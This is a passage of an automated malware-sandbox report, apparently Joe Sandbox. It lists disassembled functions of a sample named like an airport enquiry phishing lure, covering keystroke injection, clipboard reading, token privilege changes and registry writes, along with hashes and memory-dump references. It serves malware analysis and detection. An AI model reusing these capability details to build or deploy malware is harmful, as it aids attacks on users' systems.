            • Instruction Fuzzy Hash: AA7193342043428FC714EF65C4D1A6EB7E0AF98718F18492CF8979B2A2DB70EE05DB56

            Non-executed Functions

            Function 00D0CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00D0CE50
            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D0CE91
            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00D0CED6
            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D0CF00
            • SendMessageW.USER32 ref: 00D0CF29
            • _wcsncpy.LIBCMT ref: 00D0CFA1
            • GetKeyState.USER32(00000011), ref: 00D0CFC2
            • GetKeyState.USER32(00000009), ref: 00D0CFCF
            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D0CFE5
            • GetKeyState.USER32(00000010), ref: 00D0CFEF
            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D0D018
            • SendMessageW.USER32 ref: 00D0D03F
            • SendMessageW.USER32(?,00001030,?,00D0B602), ref: 00D0D145
            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00D0D15B
            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00D0D16E
            • SetCapture.USER32(?), ref: 00D0D177
            • ClientToScreen.USER32(?,?), ref: 00D0D1DC
            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00D0D1E9
            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00D0D203
            • ReleaseCapture.USER32 ref: 00D0D20E
            • GetCursorPos.USER32(?), ref: 00D0D248
            • ScreenToClient.USER32(?,?), ref: 00D0D255
            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00D0D2B1
            • SendMessageW.USER32 ref: 00D0D2DF
            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00D0D31C
            • SendMessageW.USER32 ref: 00D0D34B
            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00D0D36C
            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00D0D37B
            • GetCursorPos.USER32(?), ref: 00D0D39B
            • ScreenToClient.USER32(?,?), ref: 00D0D3A8
            • GetParent.USER32(?), ref: 00D0D3C8
            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00D0D431
            • SendMessageW.USER32 ref: 00D0D462
            • ClientToScreen.USER32(?,?), ref: 00D0D4C0
            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00D0D4F0
            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00D0D51A
            • SendMessageW.USER32 ref: 00D0D53D
            • ClientToScreen.USER32(?,?), ref: 00D0D58F
            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00D0D5C3
              • Part of subcall function 00C825DB: GetWindowLongW.USER32(?,000000EB), ref: 00C825EC
            • GetWindowLongW.USER32(?,000000F0), ref: 00D0D65F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
            • String ID: @GUI_DRAGID$F
            • API String ID: 3977979337-4164748364
            • Opcode ID: dd86bc80d349a84026075513e3e867c90f454a2974de7ff8530bfaebb5bddc97
            • Instruction ID: 3a1e3dfb86803be20a4c64ae7440417512a9d68843af9b276dbc7ca43782d519
            • Opcode Fuzzy Hash: dd86bc80d349a84026075513e3e867c90f454a2974de7ff8530bfaebb5bddc97
            • Instruction Fuzzy Hash: 6E429B74204341AFD725CF68C848BAABBE6FF49314F180619F69A876E0C731D855DBB2
            Function 00D0804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00D0873F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: %d/%02d/%02d
            • API String ID: 3850602802-328681919
            • Opcode ID: 25b87f411ab63c45581d016981207bd0fda74b4c28a9bdfcb6819a2d21245cca
            • Instruction ID: 82d8e0a2b293a62c35ad0a9b30fb25b3684257d575850c3d1c5b365f5116a24b
            • Opcode Fuzzy Hash: 25b87f411ab63c45581d016981207bd0fda74b4c28a9bdfcb6819a2d21245cca
            • Instruction Fuzzy Hash: C512BF71500344ABEB259F64CC49FAE7BB8EF85710F244129F999EB2E1DF709941EB20
            Function 00C9710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memmove$_memset
            • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
            • API String ID: 1357608183-1798697756
            • Opcode ID: 90acd37ab5944261da828507e43ad449f219dce14aad9f6f6a2233ae34aff9fa
            • Instruction ID: 3d49a42fc670a9bd982270ed32674173896b8c09e5095ee2b6854fc94b109f72
            • Opcode Fuzzy Hash: 90acd37ab5944261da828507e43ad449f219dce14aad9f6f6a2233ae34aff9fa
            • Instruction Fuzzy Hash: 51939F71A00219DBDF24CF98C885BADB7B1FF48710F25816BEA55AB390E7709E81DB50
            Function 00C84A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
            Download Yara Rule
            APIs
            • GetForegroundWindow.USER32(00000000,?), ref: 00C84A3D
            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CBDA8E
            • IsIconic.USER32(?), ref: 00CBDA97
            • ShowWindow.USER32(?,00000009), ref: 00CBDAA4
            • SetForegroundWindow.USER32(?), ref: 00CBDAAE
            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CBDAC4
            • GetCurrentThreadId.KERNEL32 ref: 00CBDACB
            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CBDAD7
            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CBDAE8
            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00CBDAF0
            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00CBDAF8
            • SetForegroundWindow.USER32(?), ref: 00CBDAFB
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CBDB10
            • keybd_event.USER32(00000012,00000000), ref: 00CBDB1B
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CBDB25
            • keybd_event.USER32(00000012,00000000), ref: 00CBDB2A
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CBDB33
            • keybd_event.USER32(00000012,00000000), ref: 00CBDB38
            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CBDB42
            • keybd_event.USER32(00000012,00000000), ref: 00CBDB47
            • SetForegroundWindow.USER32(?), ref: 00CBDB4A
            • AttachThreadInput.USER32(?,?,00000000), ref: 00CBDB71
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
            • String ID: Shell_TrayWnd
            • API String ID: 4125248594-2988720461
            • Opcode ID: c0cd6d10962f03704c6f62887d2bd52dd5f0f39f4dad81d42472e4b6c756a024
            • Instruction ID: b61a44f24bb42738f5fff03fc1e5261768a447610d73289e497b0bded6454780
            • Opcode Fuzzy Hash: c0cd6d10962f03704c6f62887d2bd52dd5f0f39f4dad81d42472e4b6c756a024
            • Instruction Fuzzy Hash: D9317371A40318BBEB316F619C49FBE7E6CEB44B50F214025FA05EA2D0D6B15941ABB1
            Function 00CD8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CD8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD8D0D
              • Part of subcall function 00CD8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD8D3A
              • Part of subcall function 00CD8CC3: GetLastError.KERNEL32 ref: 00CD8D47
            • _memset.LIBCMT ref: 00CD889B
            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00CD88ED
            • CloseHandle.KERNEL32(?), ref: 00CD88FE
            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00CD8915
            • GetProcessWindowStation.USER32 ref: 00CD892E
            • SetProcessWindowStation.USER32(00000000), ref: 00CD8938
            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00CD8952
              • Part of subcall function 00CD8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00CD8851), ref: 00CD8728
              • Part of subcall function 00CD8713: CloseHandle.KERNEL32(?,?,00CD8851), ref: 00CD873A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
            • String ID: $default$winsta0
            • API String ID: 2063423040-1027155976
            • Opcode ID: 8317526bc846a6f6790afe7a1b5b7d7b5548b36717e8f422bd0d0ffd517c9b06
            • Instruction ID: d6012d44b4845594164b98e402f40612152d43a828b48bfc9a626529c270e412
            • Opcode Fuzzy Hash: 8317526bc846a6f6790afe7a1b5b7d7b5548b36717e8f422bd0d0ffd517c9b06
            • Instruction Fuzzy Hash: 4C814271900209AFDF11DFA4DC45AEEBB78EF04704F18415BFA28A6361DB718E19EB60
            Function 00CF425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
            Download Yara Rule
            APIs
            • OpenClipboard.USER32(00D0F910), ref: 00CF4284
            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CF4292
            • GetClipboardData.USER32(0000000D), ref: 00CF429A
            • CloseClipboard.USER32 ref: 00CF42A6
            • GlobalLock.KERNEL32(00000000), ref: 00CF42C2
            • CloseClipboard.USER32 ref: 00CF42CC
            • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00CF42E1
            • IsClipboardFormatAvailable.USER32(00000001), ref: 00CF42EE
            • GetClipboardData.USER32(00000001), ref: 00CF42F6
            • GlobalLock.KERNEL32(00000000), ref: 00CF4303
            • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00CF4337
            • CloseClipboard.USER32 ref: 00CF4447
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
            • String ID:
            • API String ID: 3222323430-0
            • Opcode ID: cbe6a92fd7db656e3686a89139fd7625d57acd0f395b1887d75621ca53899a63
            • Instruction ID: 70001743e1df7e623f17b49c93932524254e8eb2c138f50717fb896643c00c6b
            • Opcode Fuzzy Hash: cbe6a92fd7db656e3686a89139fd7625d57acd0f395b1887d75621ca53899a63
            • Instruction Fuzzy Hash: AD51AF35204306ABD325FF64EC86F7F77A8AF84B00F204529F65AD22A1DB70D9059B67
            Function 00CEC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(?,?), ref: 00CEC9F8
            • FindClose.KERNEL32(00000000), ref: 00CECA4C
            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CECA71
            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CECA88
            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CECAAF
            • __swprintf.LIBCMT ref: 00CECAFB
            • __swprintf.LIBCMT ref: 00CECB3E
              • Part of subcall function 00C87F41: _memmove.LIBCMT ref: 00C87F82
            • __swprintf.LIBCMT ref: 00CECB92
              • Part of subcall function 00CA38D8: __woutput_l.LIBCMT ref: 00CA3931
            • __swprintf.LIBCMT ref: 00CECBE0
              • Part of subcall function 00CA38D8: __flsbuf.LIBCMT ref: 00CA3953
              • Part of subcall function 00CA38D8: __flsbuf.LIBCMT ref: 00CA396B
            • __swprintf.LIBCMT ref: 00CECC2F
            • __swprintf.LIBCMT ref: 00CECC7E
            • __swprintf.LIBCMT ref: 00CECCCD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
            • API String ID: 3953360268-2428617273
            • Opcode ID: 0be40e6a1e4f54fc7c7f5d1b07971b4a5ad21ccffe7454ce8ba4634c8fbd17e2
            • Instruction ID: 06a239f0d69233119f1417fb2aab57c64c6b44e1685a65f06ab6eabf55f1992f
            • Opcode Fuzzy Hash: 0be40e6a1e4f54fc7c7f5d1b07971b4a5ad21ccffe7454ce8ba4634c8fbd17e2
            • Instruction Fuzzy Hash: E6A14CB2508344ABC714FBA5C8C5DBFB7ECEF94708F440929B586C2191EB34DA09DB66
            Function 00CEF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CEF221
            • _wcscmp.LIBCMT ref: 00CEF236
            • _wcscmp.LIBCMT ref: 00CEF24D
            • GetFileAttributesW.KERNEL32(?), ref: 00CEF25F
            • SetFileAttributesW.KERNEL32(?,?), ref: 00CEF279
            • FindNextFileW.KERNEL32(00000000,?), ref: 00CEF291
            • FindClose.KERNEL32(00000000), ref: 00CEF29C
            • FindFirstFileW.KERNEL32(*.*,?), ref: 00CEF2B8
            • _wcscmp.LIBCMT ref: 00CEF2DF
            • _wcscmp.LIBCMT ref: 00CEF2F6
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEF308
            • SetCurrentDirectoryW.KERNEL32(00D3A5A0), ref: 00CEF326
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CEF330
            • FindClose.KERNEL32(00000000), ref: 00CEF33D
            • FindClose.KERNEL32(00000000), ref: 00CEF34F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
            • String ID: *.*
            • API String ID: 1803514871-438819550
            • Opcode ID: f51b7c5bae62ca2ec0312aac3764bc8b0eb8cfb14c540fd450843aef7f3daaa2
            • Instruction ID: 45d78e334b82187d11f8111612a09b2ee7f16f4f42dfdb2e6d3b9bb39d144e35
            • Opcode Fuzzy Hash: f51b7c5bae62ca2ec0312aac3764bc8b0eb8cfb14c540fd450843aef7f3daaa2
            • Instruction Fuzzy Hash: 9E31E6766012996EDB20DBB5DC58BDE73ACEF09360F200179F964D31A0EB30DB46CA64
            Function 00D00AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
            Download Yara Rule
            APIs
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D00BDE
            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D0F910,00000000,?,00000000,?,?), ref: 00D00C4C
            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00D00C94
            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00D00D1D
            • RegCloseKey.ADVAPI32(?), ref: 00D0103D
            • RegCloseKey.ADVAPI32(00000000), ref: 00D0104A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Close$ConnectCreateRegistryValue
            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
            • API String ID: 536824911-966354055
            • Opcode ID: f0adbf3868b9b3b7e0d5c8a485ed5581759dc37c77a9622bb666f47b2f2caa58
            • Instruction ID: df61fed2f8c830add52caaf805a298967a0e495eac7daf6cc353e55a152e7746
            • Opcode Fuzzy Hash: f0adbf3868b9b3b7e0d5c8a485ed5581759dc37c77a9622bb666f47b2f2caa58
            • Instruction Fuzzy Hash: DD0249752006119FCB14EF14C895B2ABBE5FF89714F08885DF98A9B3A2CB30ED41DB95
            Function 00CEF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
            Download Yara Rule
            APIs
            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CEF37E
            • _wcscmp.LIBCMT ref: 00CEF393
            • _wcscmp.LIBCMT ref: 00CEF3AA
              • Part of subcall function 00CE45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CE45DC
            • FindNextFileW.KERNEL32(00000000,?), ref: 00CEF3D9
            • FindClose.KERNEL32(00000000), ref: 00CEF3E4
            • FindFirstFileW.KERNEL32(*.*,?), ref: 00CEF400
            • _wcscmp.LIBCMT ref: 00CEF427
            • _wcscmp.LIBCMT ref: 00CEF43E
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEF450
            • SetCurrentDirectoryW.KERNEL32(00D3A5A0), ref: 00CEF46E
            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CEF478
            • FindClose.KERNEL32(00000000), ref: 00CEF485
            • FindClose.KERNEL32(00000000), ref: 00CEF497
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
            • String ID: *.*
            • API String ID: 1824444939-438819550
            • Opcode ID: 460bac8d19caa8580cd4a3b5c56600d30753b4e9c6d931bffaa1c59740992d1d
            • Instruction ID: 5660075bf3675c7b9c567ab432928ea484b4ef69ffe3a7736ec1c9057d1b882a
            • Opcode Fuzzy Hash: 460bac8d19caa8580cd4a3b5c56600d30753b4e9c6d931bffaa1c59740992d1d
            • Instruction Fuzzy Hash: 6D31D5726012996ECB20AB75EC88ADE77AC9F49324F200179F854E31E0D734DB46DA64
            Function 00CD81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CD874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD8766
              • Part of subcall function 00CD874A: GetLastError.KERNEL32(?,00CD822A,?,?,?), ref: 00CD8770
              • Part of subcall function 00CD874A: GetProcessHeap.KERNEL32(00000008,?,?,00CD822A,?,?,?), ref: 00CD877F
              • Part of subcall function 00CD874A: HeapAlloc.KERNEL32(00000000,?,00CD822A,?,?,?), ref: 00CD8786
              • Part of subcall function 00CD874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CD879D
              • Part of subcall function 00CD87E7: GetProcessHeap.KERNEL32(00000008,00CD8240,00000000,00000000,?,00CD8240,?), ref: 00CD87F3
              • Part of subcall function 00CD87E7: HeapAlloc.KERNEL32(00000000,?,00CD8240,?), ref: 00CD87FA
              • Part of subcall function 00CD87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CD8240,?), ref: 00CD880B
            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CD825B
            • _memset.LIBCMT ref: 00CD8270
            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CD828F
            • GetLengthSid.ADVAPI32(?), ref: 00CD82A0
            • GetAce.ADVAPI32(?,00000000,?), ref: 00CD82DD
            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CD82F9
            • GetLengthSid.ADVAPI32(?), ref: 00CD8316
            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CD8325
            • HeapAlloc.KERNEL32(00000000), ref: 00CD832C
            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CD834D
            • CopySid.ADVAPI32(00000000), ref: 00CD8354
            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CD8385
            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CD83AB
            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CD83BF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
            • String ID:
            • API String ID: 3996160137-0
            • Opcode ID: ac2e35d4e04361b13d275f9bc8793763d310c307424bbbd1c87ecbfcc55155a7
            • Instruction ID: de0fa29bd19c0cd199cfe0987d2b8857da3323f014c14c57a941d8140a3fcae0
            • Opcode Fuzzy Hash: ac2e35d4e04361b13d275f9bc8793763d310c307424bbbd1c87ecbfcc55155a7
            • Instruction Fuzzy Hash: 80612C71900209ABDF10DF94DC45AAEBBB9FF04710F14816AF929E73A1DB319A19DB60
            Function 00C96843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
